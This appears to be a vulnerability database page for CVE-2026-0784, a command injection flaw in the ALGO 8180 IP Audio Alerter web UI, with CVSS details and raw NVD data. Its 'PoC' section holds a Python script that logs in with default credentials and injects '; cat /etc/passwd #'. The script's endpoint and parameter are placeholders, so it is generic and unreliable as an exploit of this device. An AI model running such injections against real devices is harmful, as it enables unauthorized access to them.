CVE-2026-0784

Description

ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28293.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:algosolutions:8180_ip_audio_alerter_firmware:5.5:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:algosolutions:8180_ip_audio_alerter:-:*:*:*:*:*:*:* - NOT VULNERABLE

ALGO 8180 IP Audio Alerter 固件版本 <= 受影响版本（具体版本待官方确认）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-0784 PoC - ALGO 8180 IP Audio Alerter Command Injection
# Authentication required, low privilege is sufficient

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.local'
username = 'admin'
password = 'admin'  # Default or known credentials

# Login to get session
session = requests.Session()
login_data = {
    'username': username,
    'password': password
}

try:
    # Attempt login
    login_resp = session.post(f'{target}/login', data=login_data, timeout=10)
    
    # Command injection payload - execute arbitrary command
    # Target parameter vulnerable to command injection
    inject_payload = {
        'param': 'value; cat /etc/passwd #'  # Example: read system file
    }
    
    # Send malicious request
    exploit_resp = session.post(
        f'{target}/api/vulnerable_endpoint',
        data=inject_payload,
        timeout=10
    )
    
    print(f'Status: {exploit_resp.status_code}')
    print(f'Response: {exploit_resp.text}')
    
except requests.exceptions.RequestException as e:
    print(f'Error: {e}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0784
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0784
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0784/
[4] VulDB https://vuldb.com/cve/CVE-2026-0784
[5] https://www.zerodayinitiative.com/advisories/ZDI-26-006/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0784", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:05.907", "lastModified": "2026-02-13T20:44:11.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28293."}, {"lang": "es", "value": "Vulnerabilidad de in inyección de comandos y ejecución remota de código en la interfaz de usuario web de ALGO 8180 IP Audio Alerter. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de dispositivos ALGO 8180 IP Audio Alerter. Se requiere autenticación para explotar esta vulnerabilidad.\n\nLa falla específica reside en la interfaz de usuario basada en web. El problema se debe a la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar una llamada al sistema. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del dispositivo. Fue ZDI-CAN-28293."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:algosolutions:8180_ip_audio_alerter_firmware:5.5:*:*:*:*:*:*:*", "matchCriteriaId": "853BF5C9-122B-4F47-9CE7-DA3E307130ED"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:algosolutions:8180_ip_audio_alerter:-:*:*:*:*:*:*:*", "matchCriteriaId": "3A20E73F-D499-4973-ADDE-8B702E6F5254"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-006/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}